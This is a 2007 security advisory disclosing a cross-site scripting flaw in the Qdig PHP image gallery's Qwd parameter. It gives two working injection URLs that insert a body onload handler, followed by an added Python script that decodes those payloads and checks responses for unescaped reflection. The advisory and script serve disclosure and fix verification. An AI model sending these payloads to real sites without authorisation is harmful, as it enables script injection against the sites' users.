qdig-xss.txt

2007-02-13T00:00:00
ID PACKETSTORM:54353
Type packetstorm
Reporter Andrea Purificato
Modified 2007-02-13T00:00:00

Description

Qdig - Quick Digital Image Gallery (http://qdig.sourceforge.net/)
  
Version affected: qdig-1.2.9.3, qdig-devel-20060624   
  
Risk: XSS  
  
Description:  
Qdig is an easy-to-use PHP script that dynamically presents your digital image   
files as an online gallery or set of galleries.  
  
Vulnerability:  
It is vulnerable to an XSS (Cross Site Scripting) attack via the Qwd request parameter,
examples:
- /?Qwd=\0%22%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E   
- /?Qwd=\0%22%3Cbody%20onload=document.write(navigator.userAgent);%3E   
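
The following Python is an added example, not code from Qdig or from the advisory
author. Qdig's own source is not quoted here, so the link template in
render_vulnerable()/render_fixed() is a hypothetical model of the bug: the leading
%22 in both proof-of-concept URLs suggests the Qwd value lands inside a quoted HTML
attribute, and the payload closes that attribute and injects a <body onload=...> tag.
The host name gallery.example, the function names and the sample bodies are assumptions.
The script decodes the two PoC URLs the way a PHP script would see $_GET['Qwd'],
and classifies a response body as reflecting the payload unescaped, escaped, or not
at all, which is the check to run against a real response when verifying the issue
or a vendor fix.

```python
"""Added example (not Qdig code): decode the advisory's Qwd PoC URLs and
check a response body for unescaped reflection of the payload."""
import html
from urllib.parse import unquote_plus, urlsplit

# The two proof-of-concept URLs quoted in the advisory, prefixed with an
# assumed host name so they parse as absolute URLs.
POC_URLS = [
    "http://gallery.example/?Qwd=\\0%22%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E",
    "http://gallery.example/?Qwd=\\0%22%3Cbody%20onload=document.write(navigator.userAgent);%3E",
]


def qwd_payload(url: str) -> str:
    """Return the decoded Qwd value, i.e. what PHP sees in $_GET['Qwd'].

    The query is split on '&' only, because the second PoC contains a ';'
    inside the value and older parse_qs() versions would split on it too.
    """
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "Qwd":
            return unquote_plus(value)
    raise KeyError("Qwd parameter not present")


def render_vulnerable(qwd: str) -> str:
    """Hypothetical model of the bug (assumed template, not Qdig's code):
    the raw value is dropped into a quoted href attribute, so the payload's
    leading '"' closes the attribute and '<body onload=...>' becomes markup."""
    return f'<a href="?Qwd={qwd}">Up one level</a>'


def render_fixed(qwd: str) -> str:
    """Same assumed template with the value escaped for an HTML attribute
    context; in PHP the equivalent is htmlspecialchars($qwd, ENT_QUOTES)."""
    return f'<a href="?Qwd={html.escape(qwd, quote=True)}">Up one level</a>'


def classify_reflection(body: str, payload: str) -> str:
    """Classify how a response body reflects the decoded payload.

    'unescaped': payload appears verbatim, so the injected tag will render
    'escaped':   only the entity-encoded form appears (safe)
    'absent':    the payload is not reflected at all
    """
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


def check_poc(url: str, body: str) -> dict:
    """Bundle the decoded payload and the verdict for one URL/body pair."""
    payload = qwd_payload(url)
    return {"payload": payload, "verdict": classify_reflection(body, payload)}


if __name__ == "__main__":
    for url in POC_URLS:
        payload = qwd_payload(url)
        print("payload:", payload)
        for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
            print(f"  {label:10s} -> {classify_reflection(render(payload), payload)}")
```

To test a live instance, fetch one of the PoC URLs and pass the response body to
check_poc(); a verdict of "escaped" or "absent" after a vendor update means the
attribute-context encoding is in place, while "unescaped" means the PoC still fires.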
  
Solution:  
No solution until the author answers.
  
Credits:   
Andrea "bunker" Purificato - http://rawlab.mindcreations.com  
  
  
Mail copied to the author: haganafox AT sf (no other email found)  
--   
Andrea "bunker" Purificato  
+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++  
++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.  
  
http://rawlab.mindcreations.com   